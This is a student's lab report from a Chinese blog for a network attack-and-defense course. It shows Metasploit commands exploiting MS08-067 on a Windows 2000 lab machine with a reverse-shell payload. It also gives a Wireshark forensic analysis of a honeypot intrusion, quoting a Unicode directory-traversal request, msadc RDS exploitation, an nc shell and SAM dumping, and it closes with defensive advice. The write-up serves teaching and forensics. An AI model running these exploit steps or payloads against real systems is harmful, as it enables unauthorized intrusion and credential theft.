20232803 2023-2024-2 《网络攻防实践》实践6报告

已于 2024-04-28 11:21:34 修改
阅读量990 收藏 26
点赞数 28
文章标签: 网络
于 2024-04-27 12:05:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46701653/article/details/138239543
版权

目录

1.实践内容

  • 动手实践Metasploit windows attacker:使用metasploit软件进行windows远程渗透统计实验

  • 取证分析实践:解码一次成功的NT系统破解攻击,并分析攻击的全部过程

  • 团队对抗实践:windows系统远程渗透攻击和分析

    • 攻方使用metasploit选择漏洞进行攻击
    • 防守方使用wireshark监听获得的网络数据包

2.实践过程

2.1.动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

本次任务的实验环境如下表所示

虚拟机分类虚拟机名称IP
攻击机Kali192.168.200. 3
靶机Win2KServer192.168.200.124

  • 在kali中输入命令msfconsole打开Metasploit
    在这里插入图片描述

  • 在打开的Metasploit中输入命令search ms08_067搜索该漏洞
    在这里插入图片描述
    根据搜索结果可知,在exploit/windows/smb路径下有一个ms08_067_netapi漏洞文件

  • 输入命令use windows/smb/ms08_067_netapi使用该漏洞文件
    在这里插入图片描述

    • 输入命令show options查看该漏洞的模块选项和载荷选项
      在这里插入图片描述
    • 输入命令show payloads显示可用的攻击载荷信息在这里插入图片描述

  • 将第四个载荷payload/generic/shell_reverse_tcp作为攻击载荷

    • 使用命令set payload generic/shell_reverse_tcp设置攻击的载荷
      在这里插入图片描述

    • 使用show options查看需要设置的参数
      在这里插入图片描述

    • 使用set RHOST 192.168.200.124 设置渗透攻击的Win2K靶机的IP
      在这里插入图片描述

    • 使用set LHOST 192.168.200.3 设置渗透攻击的Kali主机的IP
      在这里插入图片描述

    • 最后使用show options查看是否设置成功
      在这里插入图片描述
      根据options中显示的RHOSTLHOST的地址可知已设置成功

  • 输入命令exploit实施渗透攻击
    在这里插入图片描述
    可以看到成功建立了连接,我们拥有了对Win2K靶机的控制权,攻击成功

  • 输入命令ipconfig查看ip地址信息
    在这里插入图片描述
    可见ip地址为192.168.200.124,确实为靶机Win2k的ip地址

2.2 取证分析实践:解码一次成功的NT系统破解攻击

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

  • 在学习通中下载demo_NT_attack_data.zip,内含snort-0204@0117.log文件,将该文件传到Kali中

  • 在Kali中,右键snort-0204@0117.log文件,选择Open With Other Application,在弹出的窗口中选择Wireshark,即使用Wireshark打开该文件
    在这里插入图片描述

  • 打开后可以看到有非常多的报文,输入ip.dst == 172.16.1.106 and http对报文进行筛选
    在这里插入图片描述

  • 117号数据包的描述信息中有一些%C0%AF的字符,右键该数据包选择Follow - TCP Stream,对该数据包进行跟踪
    在这里插入图片描述
    请求路径为/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini,其中%C0%AFUnicode编码,由此推断攻击者进行了Unicode攻击以打开boot.ini文件

  • 继续查看HTTP数据包,发现在149号数据包中攻击者探测了/msadc/msadcs.dll文件,我们跟踪该数据包的TCP流
    在这里插入图片描述
    我们可以看到数据包中有shell语句,使用dbg=c:\winnt\help\iis\htmtutorial\btcustmr.mdb进行查询,并且出现了ADM!ROX!YOUR!WORLD特征字符串,查阅资料可知,这是由rain forest puppy编写的msadc(2).pl代码发起的渗透攻击

至此,攻击者确认了目标系统提供Web服务的是ⅡSv4.0,并存在UnicodeRDS漏洞

  • 确定了攻击者使用的是msadc(2).pl渗透代码后,我们使用http.request.uri contains "msadc"进行筛选
    在这里插入图片描述
  • 跟踪3661号数据包,发现攻击者通过nc构建了一个远程shell通道,并连接6969端口,获得了访问权,进入了交互式控制阶段
    在这里插入图片描述
  • 继续跟踪
    • 攻击者查看文件
      在这里插入图片描述
    • 攻击者删除ftpcom文件
      在这里插入图片描述
    • 攻击者尝试获取密码,查看用户组并添加用户
      在这里插入图片描述
    • 尝试获取管理员权限
      在这里插入图片描述
    • 而后又尝试获取SAM备份,rdisk -s备份关键系统信息,创建了一个名为sam._SAM副本
      在这里插入图片描述
    • 获取到SAM的数据,写入文件har.txt 在这里插入图片描述
    • 攻击者发现这是一台蜜罐主机,并称这是他见过的最好的蜜罐主机
      在这里插入图片描述

问:攻击者使用了什么破解工具进行攻击?

答:攻击者对Unicode漏洞使用了Unicode攻击,并对msadcs.dll的RDS漏洞使用msadc.pl渗透工具进行攻击

问:攻击者如何使用这个破解工具进入并控制了系统?

答:攻击者首先通过Unicode漏洞对目标主机进行了信息搜集,掌握了操作系统的基本情况。然后又利用了msadcs.dll文件中的RDS漏洞,实施了SQL注入攻击。通过这一系列复杂的操作,攻击者最终成功地获得了系统的访问权限,并为自己创建了一个具有高权限的用户账户,从而实现了对目标系统的控制。

问:攻击者获得系统访问权限后做了什么

答:在成功获取系统权限后,攻击者继续尝试提升权限。尝试获取SAM的数据(写入har.txt),并尝试修改系统管理员组,以此来提高自己的访问权限。

问:我们如何防止这样的攻击

答:1.定期更新系统:确保操作系统和所有软件都安装了最新的安全补丁。
2.最小权限原则:为用户和应用程序分配最小必要的权限,以减少攻击者可利用的权限范围。
3.网络隔离:将关键系统和服务隔离在受保护的网络区域中,以减少潜在的攻击面。
4.入侵检测系统:部署入侵检测系统(IDS)和入侵防御系统(IPS)来监控和阻止可疑活动。
5.数据备份:定期备份关键数据,以防万一系统受到攻击,可以快速恢复。

问:你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

答:是的,后面攻击者已经发现了他的目标是一台蜜罐主机,并在rfp.txt文件中称这是他见过的最好的蜜罐主机

2.3 团队对抗实践:windows系统远程渗透攻击和分析

2.3.1 攻击实践
虚拟机分类虚拟机名称IP
攻击机(吴锦龙20232803Kali192.168.151. 98
靶机(张哲20232807Win2KServer192.168.151.65

  • 将两台虚拟机的网络都改为桥接模式,然后查看两台虚拟机的ip地址,检查是否在同一网段

    • 查看攻击机的ip地址
      在这里插入图片描述
    • 查看靶机的ip地址
      在这里插入图片描述
      攻击机的ip为192.168.151. 98,靶机的ip为192.168.151. 65,确认在同一网段下,可以进行下一步实践

  • 在kali中输入命令msfconsole打开Metasploit
    在这里插入图片描述

  • 输入命令use windows/smb/ms08_067_netapi使用该漏洞文件
    在这里插入图片描述

    • 输入show payloads显示可用的攻击载荷
      在这里插入图片描述

  • 将第四个载荷payload/generic/shell_reverse_tcp作为攻击载荷

    • 输入set payload generic/shell_reverse_tcp设置攻击载荷,实现反向连接
      在这里插入图片描述
    • 输入show options查看需要设置的参数
      在这里插入图片描述
    • 设置LHOST为攻击机的ip,设置RHOST为靶机的ip
      在这里插入图片描述
    • 设置好后再输入show options检查是否设置成功
      在这里插入图片描述

  • 输入exploit实施攻击
    在这里插入图片描述
    可以看到,我们已经成功获取了靶机的控制台

    • 查看ip,确认是靶机,然后尝试创建一个文件夹
      在这里插入图片描述

  • 在靶机中可以查看到刚才创建的文件夹,说明攻击成功!
    在这里插入图片描述

2.3.2 防御实践
虚拟机分类虚拟机名称IP
攻击机(张哲20232807Kali192.168.151. 10
靶机(吴锦龙20232803Win2KServer192.168.151.53
  • 将靶机Win2K的网络改为桥接模式,查看ip地址

注:靶机Win2K改为桥接模式后,可能出现与攻击机ip仍不在同一网段的情况,具体解决方案在3.学习中遇到的问题及解决

在这里插入图片描述

  • 被攻击方攻击后,在自己的文件夹中出现了攻击者创建的文件夹
    在这里插入图片描述
  • 使用Wireshark抓包,跟踪TCP流能够看到攻击者进行的一系列操作
    在这里插入图片描述

3. 学习中遇到的问题及解决

  • 问题描述:靶机Win2K的网络改为桥接模式后,靶机的ip地址与攻击机不在同一网段
  • 解决方案:在Win2K中,依次打开控制面板 - 网络和拨号连接 - 本地连接 - 属性 - Internet协议(TCP/IP) - 属性,将IP地址和DNS地址都改为自动获得
    在这里插入图片描述

4. 学习感悟

  1. 通过动手实践Metasploit,我深刻体会到了Metasploit的强大之处,Metasploit作为一个渗透测试框架,提供了丰富的漏洞利用模块,让我能够模拟真实的攻击场景。在攻击过程中,我更加深入地理解了操作系统和应用程序中的漏洞是如何被利用的。
  2. 通过解码和分析NT系统破解攻击,我认识到了取证分析在网络安全中的作用。这有助于我理解攻击者的行为模式,并学习了如何通过日志和网络流量分析来追踪和预防攻击。
  3. 在团队对抗实践中,我体会到了团队合作的重要性。作为攻击方,我需要精心策划和执行攻击;而作为防守方,我学会了使用工具如Wireshark来监控网络流量,寻找潜在的威胁。
20232803吴锦龙
关注
  • 28
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
华中科技大学网络攻防实践相关
02-14
华中科技大学网络攻防实践相关
网络攻防实践_课程报告.zip
07-19
网络攻防实践_课程报告.zip
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
05-03 817
在分析网络数据源的过程中,面对大量的数据,我学会了如何筛选和识别关键信息,通过对数据包的深入分析,我能够理解攻击者的策略和行为模式。在筛选后的数据包中发现只有NBNS包,NBNS是网络基本输入/输出系统(NetBIOS)的一部分,主要负责在基于NetBIOS名称访问的网络上提供主机名和地址映射服务。如上图所示,前面的字符串都是一些乱码,而最后出现了两个dll文件和三个没有文件名后缀的文件,根据这三个文件的文件名,猜测是程序或函数。在筛选后的数据包中只有一些TCP三次握手过程的数据包,没有数据的交互。
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
05-02 1043
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。在攻击前,打开Kali的Wireshark进行抓包,攻击完成后,在Wireshark中输入。
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
05-23 828
对于SQL注入和XSS攻击,以前只是了解但还未实践过,这一次的实践让我对它们有了直观的感受。SQL注入漏洞让用户可以随意的操作数据库进行增删改查,XSS蠕虫更是能够自我传播。这两个漏洞都是因为没有对用户输入的数据进行校验导致的,因此在开发阶段就应注意这些安全隐患。好在现如今许多开发框架都已替我们考虑到了这些安全漏洞,现在很少有网站存在SQL注入漏洞和XSS漏洞了。
20232803 2023-2024-2 《网络攻防实践实践报告
weixin_46701653的博客
04-18 976
本次实践主要学习防火墙、IDS、IPS的运行机制、原理以及配置规则等内容。通过防火墙和入侵检测,可以获取攻击者的攻击行为。防火墙和入侵检测有助于防御者采取针对性的防御措施,以最小的成本应对最大程度的威胁。蜜网网关拥有较为完善的防御机制,通过使用没有任何防御措施的蜜罐主机,诱导攻击者进入“圈套”。防御者通过观察攻击者对蜜罐主机的攻击,可以总结出攻击者的攻击手段和方法。
网络攻防技术实践-防火墙.doc
05-12
网络安全实验
网络攻防技术实践-NIDS.doc
05-12
网络安全技术实验
网络攻防技术与实践
11-17
网络攻防技术与实践》是一本面向网络安全技术初学者, 和相关专业学生的基础书籍,全面介绍了网络攻防的基本理论知识、技术, 方法和工具软件。在介绍每一部分网络攻防技术之后,通过一些自主设计, 和从社区借鉴的实践...
YOLOv10改进 | 特殊场景检测篇 | 轻量级的低照度图像增强网络IAT改进YOLOv10暗光检测(全网独家首发)
Snu77的博客
07-11 8935
本文给大家带来的改进机制是轻量级的变换器模型:Illumination Adaptive Transformer (IAT),用于图像增强和曝光校正。其基本原理是通过分解图像信号处理器(ISP)管道到局部和全局图像组件,从而恢复在低光或过/欠曝光条件下的正常光照sRGB图像。具体来说,IAT使用注意力查询来表示和调整ISP相关参数,例如颜色校正、伽马校正。模型具有约90k参数和约0.004s的处理速度,能够在低光增强和曝光校正的基准数据集上持续实现优于最新技术(State-of-The-Art, SOTA)
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
2401_82916694的博客
07-10 632
选择Shared模式,你的Mac会当作虚拟机的路由器。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。
Zabbix自动发现
Lzcsfg的博客
07-08 752
在 Zabbix 中,自动发现(Auto Discovery)是一种强大的功能,用于自动识别和监控网络设备、服务或应用程序中的动态变化。通过自动发现功能,Zabbix 可以自动添加、配置和监控新的网络节点或服务,大大简化了管理和监控大规模环境的复杂性。
从零开始做题:logtime
weixin_44626085的博客
07-10 238
给出1个pcapng文件。
访问控制的定义与原理
SafePloy_SH的博客
07-11 191
访问控制(Access Control)是一种重要的安全机制,用于限制对程序中的数据、函数、类以及计算机系统中资源(如文件、数据库、网络设备等)的访问权限。其主要目的是保护系统中的敏感信息和资源,防止未经授权的访问和操作,确保系统的安全性、完整性和可靠性。综上所述,访问控制是保障系统安全的重要手段之一,它通过限制用户对资源的访问权限来防止未经授权的访问和操作。允许用户对自身所创建的访问对象(如文件、数据表等)进行访问,并可将对这些对象的访问权授予其他用户或收回其访问权限。
windows局域网文件传输方案
aidayei的专栏
07-08 303
1.共享文件:采用smb协议传输数据,可以直接通过windows资源管理器地址栏中输入ip:\share目录,也可以用windows自带的Robocopy命令拷贝。2.ftp方式:采用ftp协议传输数据,服务端需要有ftp服务器,或者采用sftp或scp方式,需要服务端装open-ssh服务器。4.tcp/udp方式:采用tcp/udp协议传输数据,需要自己编写socket服务端和客户端,传输数据切割和重组等。3.http方式:采用http协议传输数据,服务端需要装python,通过python -m。
UDP协议介绍和作用
小蜜蜂vs码农
07-10 1039
UDP协议介绍和作用
SQL Server设置端口:跨平台指南
招风的黑耳CSDN
07-09 583
在使用SQL Server时,设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上,包括Windows、Linux和Docker容器等,因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南,帮助您在不同环境下设置SQL Server的端口。
ENSP防火墙综合配置
最新发布
Enjoy_zhuo的博客
07-11 141
因为ISP返回的数据包会被防火墙最后的默认安全策略给拒绝,所以,把要ISP返回的数据给允许通过。
2021实战攻防企业红蓝对抗实践指南-长亭.pdf
07-17
《2021实战攻防企业红蓝对抗实践指南-长亭.pdf》是一份关于红蓝对抗实践的指南文件。红蓝对抗是一种模拟真实攻击和防御的方法,旨在测试企业的安全性能和发现潜在漏洞。 该指南首先介绍了红蓝对抗实践的基本概念和目标。红队代表攻击方,利用各种技术手段和策略试图入侵企业系统,而蓝队则代表防御方,负责检测和阻止攻击,并进行相应的应对和修复措施。 接下来,指南详细解释了红蓝对抗实践的步骤和流程。其中包括情报收集,攻击路径规划,漏洞利用,权限提升,数据抓取等环节,通过逐步深入渗透,验证企业的安全性。 在红蓝对抗实践中,指南还提供了一些常用的攻击技术和实用工具的介绍,如渗透测试工具、漏洞扫描工具和安全分析工具等。同时,还给出了常见的安全防御策略和技术建议,如强化访问控制,加强日志监控和事件响应能力等。 此外,指南还强调了红蓝对抗实践的重要性,并提供了一些实战案例和经验分享,帮助企业更好地理解和应用红蓝对抗技术,提升自身的网络安全防御水平。 总之,《2021实战攻防企业红蓝对抗实践指南-长亭.pdf》是一份全面而实用的红蓝对抗实践指南,对于希望提升网络安全能力的企业和安全从业人员来说,具有很高的参考价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值